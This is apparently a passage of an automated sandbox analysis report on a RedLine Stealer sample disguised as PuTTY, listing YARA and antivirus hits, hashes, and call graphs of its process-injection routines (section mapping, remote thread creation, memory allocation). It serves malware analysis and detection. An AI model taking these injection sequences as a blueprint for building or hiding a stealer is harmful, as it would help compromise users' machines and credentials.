                                                                                                                        • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000007.00000002.1730528749.0000000000550000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                        Antivirus matches:
                                                                                                                        • Detection: 100%, Avira
                                                                                                                        • Detection: 100%, Joe Sandbox ML
                                                                                                                        Reputation:low
                                                                                                                        Has exited:true

                                                                                                                        Reset < >
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000002.00000002.1439831840.00007FFAAB860000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB860000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_2_2_7ffaab860000_powershell.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: r6g$r6g
                                                                                                                          • API String ID: 0-2484190097
                                                                                                                          • Opcode ID: d04de5aec381f8c124e90eb1d9c649d959c431959fb22cd3a03ddbee92de9b53
                                                                                                                          • Instruction ID: 62144d27b6d9374abe93dc9f040fa31c9a1ab8aa8013c290fe8409bce589db08
                                                                                                                          • Opcode Fuzzy Hash: d04de5aec381f8c124e90eb1d9c649d959c431959fb22cd3a03ddbee92de9b53
                                                                                                                          • Instruction Fuzzy Hash: 72421A6291EBC64FE796972C48656B5BFE1EF5B250F0841FAD08DC71A3ED186C0983C2
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000002.00000002.1439831840.00007FFAAB860000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB860000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_2_2_7ffaab860000_powershell.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: r6g$r6g
                                                                                                                          • API String ID: 0-2484190097
                                                                                                                          • Opcode ID: ae65617a9b0a0deef54e6cb87931728888de3a907d1175e938b13a1e00e8a671
                                                                                                                          • Instruction ID: b833c3492fd55c89b72749dc386522db47d06eb81287ae5c4b985615596a5a64
                                                                                                                          • Opcode Fuzzy Hash: ae65617a9b0a0deef54e6cb87931728888de3a907d1175e938b13a1e00e8a671
                                                                                                                          • Instruction Fuzzy Hash: 35115923E1FA168BF2D99B1C656347DA2C1EF49690F4C41F5D40E835A2ED08780941C2
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000002.00000002.1439831840.00007FFAAB860000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB860000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_2_2_7ffaab860000_powershell.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 7a198284aa6b5b46b02cd112a9a93db4e6ea0cb298d395681aa5a2007323835a
                                                                                                                          • Instruction ID: 1a82e70969a226909d48d4384846f03e462d08f6e15f437dd33d62028d5ca00c
                                                                                                                          • Opcode Fuzzy Hash: 7a198284aa6b5b46b02cd112a9a93db4e6ea0cb298d395681aa5a2007323835a
                                                                                                                          • Instruction Fuzzy Hash: B141C65291FAC78BF7A6972C4875278D5D1FF5A290F5880F9E54DC71E3ED18AC0842C1
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000002.00000002.1439405306.00007FFAAB790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB790000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_2_2_7ffaab790000_powershell.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 08da065673a25bdeb927b4c2f952ba14616e05d90be0e25124618a69153761d0
                                                                                                                          • Instruction ID: 95bf0e2e092caa83a727d13c44eb33e65364c1fc92c2899f4f25e58935048f5e
                                                                                                                          • Opcode Fuzzy Hash: 08da065673a25bdeb927b4c2f952ba14616e05d90be0e25124618a69153761d0
                                                                                                                          • Instruction Fuzzy Hash: 6101677111CB0C8FD748EF0CE451AA5B7E0FB95364F10056DE58AC3661DA36E882CB45
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000002.00000002.1439831840.00007FFAAB860000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB860000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_2_2_7ffaab860000_powershell.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 8993c0935f3a67e37c79a1990adfb11d038f8e6dfa42f228f7393f5e2ecbedf2
                                                                                                                          • Instruction ID: 0f8362a48a2ccb5fb1536c18845e5c22855b89f52f5a6cefe2a6414d81984de4
                                                                                                                          • Opcode Fuzzy Hash: 8993c0935f3a67e37c79a1990adfb11d038f8e6dfa42f228f7393f5e2ecbedf2
                                                                                                                          • Instruction Fuzzy Hash: E9E06833E0E86A8EABA1EA9C286C4F8A280DF58260F0481F3E80DD3191DC00EC0443C5
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000002.00000002.1439831840.00007FFAAB860000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB860000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_2_2_7ffaab860000_powershell.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: 8hi$8hi$8hi$8hi
                                                                                                                          • API String ID: 0-3122973501
                                                                                                                          • Opcode ID: 000aa42026f989f7be6df58bd6d1993da1a8af092ec20ae0e92d1c0433063ecc
                                                                                                                          • Instruction ID: 4d380946bd8ac326a808a24de2e33087d4d12aba9eea1c5757bacb0b6b08aaf0
                                                                                                                          • Opcode Fuzzy Hash: 000aa42026f989f7be6df58bd6d1993da1a8af092ec20ae0e92d1c0433063ecc
                                                                                                                          • Instruction Fuzzy Hash: 8FA14962A0EB858FE7969B2C9865571FBD1DF6B250F0841FBD08DC71A3D909AC0A83D1
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000002.00000002.1439405306.00007FFAAB790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB790000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_2_2_7ffaab790000_powershell.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: M_^$M_^F$M_^M$M_^T
                                                                                                                          • API String ID: 0-744770990
                                                                                                                          • Opcode ID: 97320b8b24c5e66a8e9e5d4912dab72c59efbb403629a65763a0085a29473260
                                                                                                                          • Instruction ID: 8ab80b4408bd7745da0ebb869ad4031421d45587db99f805d8b836a530a0d548
                                                                                                                          • Opcode Fuzzy Hash: 97320b8b24c5e66a8e9e5d4912dab72c59efbb403629a65763a0085a29473260
                                                                                                                          • Instruction Fuzzy Hash: 1B412BA390E2A5DEE3167778F8554EC3F64DF522A4B0A86F7D08CCB0B3ED0928094291
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000002.00000002.1439831840.00007FFAAB860000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB860000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_2_2_7ffaab860000_powershell.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: 8hi$8hi$8hi$8hi
                                                                                                                          • API String ID: 0-3122973501
                                                                                                                          • Opcode ID: 236873441a71f9d5d5711e08b7536ef38c891d2e9544aca4d70cb372a1dde610
                                                                                                                          • Instruction ID: b376d61248f4c548791c1b2c6baf66766dacffa9fa2701f13652619a43119940
                                                                                                                          • Opcode Fuzzy Hash: 236873441a71f9d5d5711e08b7536ef38c891d2e9544aca4d70cb372a1dde610
                                                                                                                          • Instruction Fuzzy Hash: 47512752A0EBC64FD3668B6C58655B4BFE1EF5B250B0881FBD08DC71E3D8596C0A83D1

                                                                                                                          Execution Graph

                                                                                                                          Execution Coverage:6.2%
                                                                                                                          Dynamic/Decrypted Code Coverage:80.9%
                                                                                                                          Signature Coverage:39.5%
                                                                                                                          Total number of Nodes:162
                                                                                                                          Total number of Limit Nodes:6
                                                                                                                          execution_graph 7530 4013ca 7531 4013d0 7530->7531 7532 401564 NtDuplicateObject 7531->7532 7541 401478 7531->7541 7533 401581 NtCreateSection 7532->7533 7532->7541 7534 401601 NtCreateSection 7533->7534 7535 4015a7 NtMapViewOfSection 7533->7535 7537 40162d 7534->7537 7534->7541 7535->7534 7536 4015ca NtMapViewOfSection 7535->7536 7536->7534 7538 4015e8 7536->7538 7539 401637 NtMapViewOfSection 7537->7539 7537->7541 7538->7534 7540 40165e NtMapViewOfSection 7539->7540 7539->7541 7540->7541 7379 402f8f 7380 4030d2 7379->7380 7381 402fb9 7379->7381 7381->7380 7382 403074 RtlCreateUserThread NtTerminateProcess 7381->7382 7382->7380 7452 40148f 7453 401414 7452->7453 7460 401478 7452->7460 7454 401564 NtDuplicateObject 7453->7454 7453->7460 7455 401581 NtCreateSection 7454->7455 7454->7460 7456 401601 NtCreateSection 7455->7456 7457 4015a7 NtMapViewOfSection 7455->7457 7459 40162d 7456->7459 7456->7460 7457->7456 7458 4015ca NtMapViewOfSection 7457->7458 7458->7456 7461 4015e8 7458->7461 7459->7460 7462 401637 NtMapViewOfSection 7459->7462 7461->7456 7462->7460 7463 40165e NtMapViewOfSection 7462->7463 7463->7460 7286 402e51 7287 402e44 7286->7287 7289 402ef2 7287->7289 7290 401891 7287->7290 7291 4018a1 7290->7291 7292 4018da Sleep 7291->7292 7297 4013bf 7292->7297 7294 4018f5 7296 401906 7294->7296 7309 4014b5 7294->7309 7296->7289 7298 4013d0 7297->7298 7299 401564 NtDuplicateObject 7298->7299 7305 401478 7298->7305 7300 401581 NtCreateSection 7299->7300 7299->7305 7301 401601 NtCreateSection 7300->7301 7302 4015a7 NtMapViewOfSection 7300->7302 7304 40162d 7301->7304 7301->7305 7302->7301 7303 4015ca NtMapViewOfSection 7302->7303 7303->7301 7306 4015e8 7303->7306 7304->7305 7307 401637 NtMapViewOfSection 7304->7307 7305->7294 7306->7301 7307->7305 7308 40165e NtMapViewOfSection 7307->7308 7308->7305 7310 4014c6 7309->7310 7311 401564 NtDuplicateObject 7310->7311 7317 401680 7310->7317 7312 401581 NtCreateSection 7311->7312 7311->7317 7313 401601 NtCreateSection 7312->7313 7314 4015a7 NtMapViewOfSection 7312->7314 7316 40162d 7313->7316 7313->7317 7314->7313 7315 4015ca NtMapViewOfSection 7314->7315 7315->7313 7318 4015e8 7315->7318 7316->7317 7319 401637 NtMapViewOfSection 7316->7319 7317->7296 7318->7313 7319->7317 7320 40165e NtMapViewOfSection 7319->7320 7320->7317 7428 4014d3 7429 4014d8 7428->7429 7430 401564 NtDuplicateObject 7429->7430 7436 401680 7429->7436 7431 401581 NtCreateSection 7430->7431 7430->7436 7432 401601 NtCreateSection 7431->7432 7433 4015a7 NtMapViewOfSection 7431->7433 7435 40162d 7432->7435 7432->7436 7433->7432 7434 4015ca NtMapViewOfSection 7433->7434 7434->7432 7437 4015e8 7434->7437 7435->7436 7438 401637 NtMapViewOfSection 7435->7438 7437->7432 7438->7436 7439 40165e NtMapViewOfSection 7438->7439 7439->7436 7360 60003c 7361 600049 7360->7361 7373 600e0f SetErrorMode SetErrorMode 7361->7373 7366 600265 7367 6002ce VirtualProtect 7366->7367 7369 60030b 7367->7369 7368 600439 VirtualFree 7372 6004be LoadLibraryA 7368->7372 7369->7368 7371 6008c7 7372->7371 7374 600223 7373->7374 7375 600d90 7374->7375 7376 600dad 7375->7376 7377 600238 VirtualAlloc 7376->7377 7378 600dbb GetPEB 7376->7378 7377->7366 7378->7377 7464 40189c 7465 4018ae 7464->7465 7466 4018da Sleep 7465->7466 7467 4013bf 7 API calls 7466->7467 7468 4018f5 7467->7468 7469 4014b5 7 API calls 7468->7469 7470 401906 7468->7470 7469->7470 7395 600001 7396 600005 7395->7396 7401 60092b GetPEB 7396->7401 7398 600030 7403 60003c 7398->7403 7402 600972 7401->7402 7402->7398 7404 600049 7403->7404 7405 600e0f 2 API calls 7404->7405 7406 600223 7405->7406 7407 600d90 GetPEB 7406->7407 7408 600238 VirtualAlloc 7407->7408 7409 600265 7408->7409 7410 6002ce VirtualProtect 7409->7410 7412 60030b 7410->7412 7411 600439 VirtualFree 7415 6004be LoadLibraryA 7411->7415 7412->7411 7414 6008c7 7415->7414 7336 40bc65 7339 40baca 7336->7339 7338 40bc74 7340 40bad6 getSystemCP __setmbcp __malloc_crt 7339->7340 7342 40bb2d __setmbcp 7340->7342 7343 40b8e5 7340->7343 7342->7338 7345 40b905 getSystemCP __setmbcp_nolock 7343->7345 7344 40b910 setSBCS 7344->7342 7345->7344 7347 40b632 7345->7347 7348 40b659 ___crtGetStringTypeA 7347->7348 7352 40b718 7348->7352 7353 40ff63 7348->7353 7351 40ff63 ___crtLCMapStringA LCMapStringW 7351->7352 7352->7345 7354 40ff76 7353->7354 7357 40fbbe 7354->7357 7356 40b6f3 7356->7351 7358 40fbdf LCMapStringW 7357->7358 7359 40fbfa __freea ___convertcp ___ansicp 7357->7359 7358->7359 7359->7356 7416 600005 7417 60092b GetPEB 7416->7417 7418 600030 7417->7418 7419 60003c 7 API calls 7418->7419 7420 600038 7419->7420 7497 402d2c 7498 402d35 7497->7498 7499 401891 15 API calls 7498->7499 7500 402ef2 7498->7500 7499->7500 7321 541520 7322 54152f 7321->7322 7325 541cc0 7322->7325 7326 541cdb 7325->7326 7327 541ce4 CreateToolhelp32Snapshot 7326->7327 7328 541d00 Module32First 7326->7328 7327->7326 7327->7328 7329 541d0f 7328->7329 7331 541538 7328->7331 7332 54197f 7329->7332 7333 5419aa 7332->7333 7334 5419f3 7333->7334 7335 5419bb VirtualAlloc 7333->7335 7334->7334 7335->7334 7501 40f1bd 7504 40f031 7501->7504 7505 40f045 7504->7505 7510 410b52 7505->7510 7507 410b52 __forcdecpt_l LCMapStringW 7509 40f06e 7507->7509 7508 40f051 __forcdecpt_l 7508->7507 7511 410b70 7510->7511 7512 410b60 7510->7512 7514 410a3d 7511->7514 7512->7508 7515 410a52 __isleadbyte_l 7514->7515 7516 410a5e __isctype_l 7515->7516 7517 40ff63 ___crtLCMapStringA LCMapStringW 7515->7517 7516->7512 7517->7516

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 85 4013bf-4013c8 86 4013d0-4013d6 85->86 87 4013da 85->87 88 4013dd-401422 call 40113b 86->88 87->86 87->88 98 401424-401440 88->98 99 401496-40149e 88->99 101 401442 98->101 102 4014b7-4014d5 98->102 100 4014a0-4014b2 99->100 104 401492-401494 101->104 105 401444-401446 101->105 107 4014c6-4014e9 102->107 105->100 106 401448-401461 105->106 110 401463-401468 106->110 111 4014c4 106->111 115 4014e0 107->115 113 4014e5-4014f8 110->113 114 40146a 110->114 111->107 122 4014f1-4014f4 113->122 123 4014fb-40150e call 40113b 113->123 116 40146c-401476 114->116 117 4014de 114->117 115->113 119 401414-401422 116->119 120 401478-40147c 116->120 117->115 119->98 119->99 122->123 126 401510 123->126 127 401513-401518 123->127 126->127 129 40183d-401845 127->129 130 40151e-40152f 127->130 129->127 135 40184a 129->135 133 401535-40155e 130->133 134 40183b 130->134 133->134 144 401564-40157b NtDuplicateObject 133->144 134->135 136 401861 135->136 137 401852-40185d 135->137 136->137 138 401864-40188e call 40113b 136->138 137->138 144->134 146 401581-4015a5 NtCreateSection 144->146 148 401601-401627 NtCreateSection 146->148 149 4015a7-4015c8 NtMapViewOfSection 146->149 148->134 151 40162d-401631 148->151 149->148 150 4015ca-4015e6 NtMapViewOfSection 149->150 150->148 154 4015e8-4015fe 150->154 151->134 155 401637-401658 NtMapViewOfSection 151->155 154->148 155->134 157 40165e-40167a NtMapViewOfSection 155->157 157->134 159 401680 call 401685 157->159
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000004.00000002.1493379065.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_4_2_400000_putty.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: f1a6a853dab4f549cc320576fe09db09b07e35a282cbb1e4dab32455e86f95e0
                                                                                                                          • Instruction ID: b303ee40ce3cd715bffe5459f1355022e0f5cf8d3c2eb96fe6471530370b2b0e
                                                                                                                          • Opcode Fuzzy Hash: f1a6a853dab4f549cc320576fe09db09b07e35a282cbb1e4dab32455e86f95e0
                                                                                                                          • Instruction Fuzzy Hash: 3BA10872A04204FBEB219F91CC45EEB7BB8EF81710F24452BF902BA1F1D6749902DB65

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 161 4014b5-4014f8 170 4014f1-4014f4 161->170 171 4014fb-40150e call 40113b 161->171 170->171 174 401510 171->174 175 401513-401518 171->175 174->175 177 40183d-401845 175->177 178 40151e-40152f 175->178 177->175 183 40184a 177->183 181 401535-40155e 178->181 182 40183b 178->182 181->182 192 401564-40157b NtDuplicateObject 181->192 182->183 184 401861 183->184 185 401852-40185d 183->185 184->185 186 401864-40188e call 40113b 184->186 185->186 192->182 194 401581-4015a5 NtCreateSection 192->194 196 401601-401627 NtCreateSection 194->196 197 4015a7-4015c8 NtMapViewOfSection 194->197 196->182 199 40162d-401631 196->199 197->196 198 4015ca-4015e6 NtMapViewOfSection 197->198 198->196 202 4015e8-4015fe 198->202 199->182 203 401637-401658 NtMapViewOfSection 199->203 202->196 203->182 205 40165e-40167a NtMapViewOfSection 203->205 205->182 207 401680 call 401685 205->207
                                                                                                                          APIs
                                                                                                                          • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401573
                                                                                                                          • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004015A0
                                                                                                                          • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004015C3
                                                                                                                          • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004015E1
                                                                                                                          • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401622
                                                                                                                          • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401653
                                                                                                                          • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401675
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000004.00000002.1493379065.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_4_2_400000_putty.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Section$View$Create$DuplicateObject
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1546783058-0
                                                                                                                          • Opcode ID: 719849d05dd569a84f102b076dd352e16165c28b1771b30273656c5f16ef7e6e
                                                                                                                          • Instruction ID: 19a1d6b0ff796e10bf8f41dee95350edbff68fa9ff5f9bfea876b5d94b6971b3
                                                                                                                          • Opcode Fuzzy Hash: 719849d05dd569a84f102b076dd352e16165c28b1771b30273656c5f16ef7e6e
                                                                                                                          • Instruction Fuzzy Hash: C9513BB1900245BFEB209F91CC48FAB7BB8FF85B10F14412AFA11BA2E5D6759941CB64

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 209 4014d3-4014eb 211 4014d8-4014f8 209->211 212 4014ed-4014f4 209->212 214 4014fb-40150e call 40113b 211->214 224 4014f1-4014f4 211->224 212->214 219 401510 214->219 220 401513-401518 214->220 219->220 225 40183d-401845 220->225 226 40151e-40152f 220->226 224->214 225->220 231 40184a 225->231 229 401535-40155e 226->229 230 40183b 226->230 229->230 240 401564-40157b NtDuplicateObject 229->240 230->231 232 401861 231->232 233 401852-40185d 231->233 232->233 234 401864-40188e call 40113b 232->234 233->234 240->230 242 401581-4015a5 NtCreateSection 240->242 244 401601-401627 NtCreateSection 242->244 245 4015a7-4015c8 NtMapViewOfSection 242->245 244->230 247 40162d-401631 244->247 245->244 246 4015ca-4015e6 NtMapViewOfSection 245->246 246->244 250 4015e8-4015fe 246->250 247->230 251 401637-401658 NtMapViewOfSection 247->251 250->244 251->230 253 40165e-40167a NtMapViewOfSection 251->253 253->230 255 401680 call 401685 253->255
                                                                                                                          APIs
                                                                                                                          • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401573
                                                                                                                          • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004015A0
                                                                                                                          • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004015C3
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000004.00000002.1493379065.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_4_2_400000_putty.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Section$CreateDuplicateObjectView
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1652636561-0
                                                                                                                          • Opcode ID: b37d7a3f5bcaad5f7e116b16f8babae0ae157dca3b6d02a9ae2d42698eee0e78
                                                                                                                          • Instruction ID: 8103355e2e942ff69e8c14b284ac6daeef9955d1bae1450e847efa7766c746d9
                                                                                                                          • Opcode Fuzzy Hash: b37d7a3f5bcaad5f7e116b16f8babae0ae157dca3b6d02a9ae2d42698eee0e78
                                                                                                                          • Instruction Fuzzy Hash: 245127B1900245BBEF209F91CC48FABBBB8EF86B00F144159FA11BA2A5D6719941CB24

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 257 4014f7-40150e call 40113b 261 401510 257->261 262 401513-401518 257->262 261->262 264 40183d-401845 262->264 265 40151e-40152f 262->265 264->262 270 40184a 264->270 268 401535-40155e 265->268 269 40183b 265->269 268->269 279 401564-40157b NtDuplicateObject 268->279 269->270 271 401861 270->271 272 401852-40185d 270->272 271->272 273 401864-40188e call 40113b 271->273 272->273 279->269 281 401581-4015a5 NtCreateSection 279->281 283 401601-401627 NtCreateSection 281->283 284 4015a7-4015c8 NtMapViewOfSection 281->284 283->269 286 40162d-401631 283->286 284->283 285 4015ca-4015e6 NtMapViewOfSection 284->285 285->283 289 4015e8-4015fe 285->289 286->269 290 401637-401658 NtMapViewOfSection 286->290 289->283 290->269 292 40165e-40167a NtMapViewOfSection 290->292 292->269 294 401680 call 401685 292->294
                                                                                                                          APIs
                                                                                                                          • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401573
                                                                                                                          • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004015A0
                                                                                                                          • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004015C3
                                                                                                                          • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004015E1
                                                                                                                          • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401622
                                                                                                                          • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401653
                                                                                                                          • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401675
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000004.00000002.1493379065.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_4_2_400000_putty.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Section$View$Create$DuplicateObject
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1546783058-0
                                                                                                                          • Opcode ID: f4d7e0ef1ba092f52e3f3aa053b09444c5da80675db222bfe35b70c903d8b2e5
                                                                                                                          • Instruction ID: 2227e086d9928dda04f460d80950503c889386f6503bf0ca9f5f85cfbacfc3af
                                                                                                                          • Opcode Fuzzy Hash: f4d7e0ef1ba092f52e3f3aa053b09444c5da80675db222bfe35b70c903d8b2e5
                                                                                                                          • Instruction Fuzzy Hash: 8B5107B1900249BFEF209F91CC48FAFBBB8EF85B10F144159FA11BA2A5D6719945CB24

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 296 402f8f-402fb3 297 4030d2-4030d7 296->297 298 402fb9-402fd1 296->298 298->297 299 402fd7-402fe8 298->299 300 402fea-402ff3 299->300 301 402ff8-403006 300->301 301->301 302 403008-40300f 301->302 303 403031-403038 302->303 304 403011-403030 302->304 305 40305a-40305d 303->305 306 40303a-403059 303->306 304->303 307 403066 305->307 308 40305f-403062 305->308 306->305 307->300 310 403068-40306d 307->310 308->307 309 403064 308->309 309->310 310->297 311 40306f-403072 310->311 311->297 312 403074-4030cf RtlCreateUserThread NtTerminateProcess 311->312 312->297
                                                                                                                          APIs
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000004.00000002.1493379065.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_4_2_400000_putty.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: CreateProcessTerminateThreadUser
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1921587553-0
                                                                                                                          • Opcode ID: 3666794f6f76943507f515948c416729d2a122008cd61b3dc3cfc1699990bb7a
                                                                                                                          • Instruction ID: aa2530698c6aa4494656ae1f9c01ee64b6dc24c6198c14284b052c109098bfb9
                                                                                                                          • Opcode Fuzzy Hash: 3666794f6f76943507f515948c416729d2a122008cd61b3dc3cfc1699990bb7a
                                                                                                                          • Instruction Fuzzy Hash: 1F415832618E0C4FD778EE6CA88966377D5E794351B56437AE809D3388EE30DC5183C5

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 313 541cc0-541cd9 314 541cdb-541cdd 313->314 315 541ce4-541cf0 CreateToolhelp32Snapshot 314->315 316 541cdf 314->316 317 541d00-541d0d Module32First 315->317 318 541cf2-541cf8 315->318 316->315 319 541d16-541d1e 317->319 320 541d0f-541d10 call 54197f 317->320 318->317 323 541cfa-541cfe 318->323 324 541d15 320->324 323->314 323->317 324->319
                                                                                                                          APIs
                                                                                                                          • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 00541CE8
                                                                                                                          • Module32First.KERNEL32(00000000,00000224), ref: 00541D08
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000004.00000002.1493586854.0000000000530000.00000040.00001000.00020000.00000000.sdmp, Offset: 00530000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_4_2_530000_putty.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: CreateFirstModule32SnapshotToolhelp32
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3833638111-0
                                                                                                                          • Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                                                                                          • Instruction ID: 36ac583e1c1f0f59f407e493ba2815789a2df5f0767acc7688af92a70698274b
                                                                                                                          • Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                                                                                          • Instruction Fuzzy Hash: 7AF0C231500B116BD7202BF59C8DBAA7AE8BF493ADF100128E642910C0CA70EC854668

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
